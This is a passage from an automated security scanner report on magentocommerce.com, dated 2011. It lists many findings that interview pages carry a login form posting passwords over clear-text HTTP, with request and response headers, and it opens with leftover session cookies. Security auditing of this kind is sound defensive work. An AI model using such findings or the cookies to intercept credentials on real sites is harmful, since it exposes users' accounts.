User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=8gleaor858b1qbfp47t52qb1o1; guid=db13949594b1b3d2138f3212e370aacf; homepage_intro=1; exp_domain=c; exp_last_visit=997810899; exp_last_activity=1313170899; exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fproduct%2Fenterprise-level%2F%22%3Bi%3A2%3Bs%3A5%3A%22index%22%3B%7D; __utma=94789760.769027909.1313156482.1313156482.1313156482.1; __utmb=94789760.3.10.1313156482; __utmc=94789760; __utmz=94789760.1313156482.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:397-EXO-877&token:_mch-magentocommerce.com-1313156482005-48894

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 13:41:50 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313170909; expires=Sat, 11-Aug-2012 13:41:49 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A18%3A%22%2Fmedia%2Finterviews%2F%22%3Bi%3A1%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fproduct%2Fenterprise-level%2F%22%3Bi%3A3%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 13:41:50 GMT
Content-Length: 37734

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.57. http://www.magentocommerce.com/media/interviews/alpedia/view  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/alpedia/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /media/interviews/alpedia/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:06:07 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175966; expires=Sat, 11-Aug-2012 15:06:06 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A31%3A%22%2Fmedia%2Finterviews%2Falpedia%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:06:07 GMT
Content-Length: 38228

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.58. http://www.magentocommerce.com/media/interviews/bright-light-media/view  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/bright-light-media/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /media/interviews/bright-light-media/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:05:34 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175934; expires=Sat, 11-Aug-2012 15:05:34 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A42%3A%22%2Fmedia%2Finterviews%2Fbright-light-media%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:05:34 GMT
Content-Length: 39078

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.59. http://www.magentocommerce.com/media/interviews/buettenpapierfabrik-gmund/view  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/buettenpapierfabrik-gmund/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /media/interviews/buettenpapierfabrik-gmund/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:05:56 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175956; expires=Sat, 11-Aug-2012 15:05:56 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A49%3A%22%2Fmedia%2Finterviews%2Fbuettenpapierfabrik-gmund%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:05:56 GMT
Content-Length: 37720

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.60. http://www.magentocommerce.com/media/interviews/jack-wolfskin/view  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/jack-wolfskin/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /media/interviews/jack-wolfskin/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:05:10 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175910; expires=Sat, 11-Aug-2012 15:05:10 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A37%3A%22%2Fmedia%2Finterviews%2Fjack-wolfskin%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:05:10 GMT
Content-Length: 39204

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.61. http://www.magentocommerce.com/media/interviews/liaison-dangereuse/view  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/liaison-dangereuse/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /media/interviews/liaison-dangereuse/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:05:58 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175958; expires=Sat, 11-Aug-2012 15:05:58 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A42%3A%22%2Fmedia%2Finterviews%2Fliaison-dangereuse%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:05:58 GMT
Content-Length: 37866

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.62. http://www.magentocommerce.com/media/interviews/lodger-footwear/view  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/lodger-footwear/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /media/interviews/lodger-footwear/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:44 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175884; expires=Sat, 11-Aug-2012 15:04:44 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A39%3A%22%2Fmedia%2Finterviews%2Flodger-footwear%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:04:44 GMT
Content-Length: 37831

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.63. http://www.magentocommerce.com/media/interviews/man-junk/view  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/man-junk/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /media/interviews/man-junk/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:05:47 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175946; expires=Sat, 11-Aug-2012 15:05:46 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A32%3A%22%2Fmedia%2Finterviews%2Fman-junk%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:05:47 GMT
Content-Length: 37429

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.64. http://www.magentocommerce.com/media/interviews/nerdyshirts/view  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/nerdyshirts/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /media/interviews/nerdyshirts/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:06:00 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175960; expires=Sat, 11-Aug-2012 15:06:00 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A35%3A%22%2Fmedia%2Finterviews%2Fnerdyshirts%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:06:00 GMT
Content-Length: 37004

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.65. http://www.magentocommerce.com/media/interviews/quadra-informatique-and-anneau-du-rhin-society/view  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/quadra-informatique-and-anneau-du-rhin-society/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /media/interviews/quadra-informatique-and-anneau-du-rhin-society/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:50 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175890; expires=Sat, 11-Aug-2012 15:04:50 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A70%3A%22%2Fmedia%2Finterviews%2Fquadra-informatique-and-anneau-du-rhin-society%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:04:50 GMT
Content-Length: 38775

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.66. http://www.magentocommerce.com/media/interviews/sbs-broadcasting/view  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/sbs-broadcasting/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /media/interviews/sbs-broadcasting/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:05:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175905; expires=Sat, 11-Aug-2012 15:05:05 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A40%3A%22%2Fmedia%2Finterviews%2Fsbs-broadcasting%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:05:05 GMT
Content-Length: 38327

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.67. http://www.magentocommerce.com/media/interviews/shoebacca/view  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/shoebacca/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /media/interviews/shoebacca/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:06:13 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175973; expires=Sat, 11-Aug-2012 15:06:13 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A33%3A%22%2Fmedia%2Finterviews%2Fshoebacca%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:06:13 GMT
Content-Length: 37269

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.68. http://www.magentocommerce.com/media/interviews/signing-time/view  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/signing-time/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /media/interviews/signing-time/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:06:04 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175964; expires=Sat, 11-Aug-2012 15:06:04 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A36%3A%22%2Fmedia%2Finterviews%2Fsigning-time%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:06:04 GMT
Content-Length: 39390

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.69. http://www.magentocommerce.com/media/interviews/stella-lena-ny/view  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/stella-lena-ny/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /media/interviews/stella-lena-ny/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:06:15 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175974; expires=Sat, 11-Aug-2012 15:06:14 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A38%3A%22%2Fmedia%2Finterviews%2Fstella-lena-ny%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:06:15 GMT
Content-Length: 39153

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
2.70. http://www.magentocommerce.com/media/interviews/timeout-online/view  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
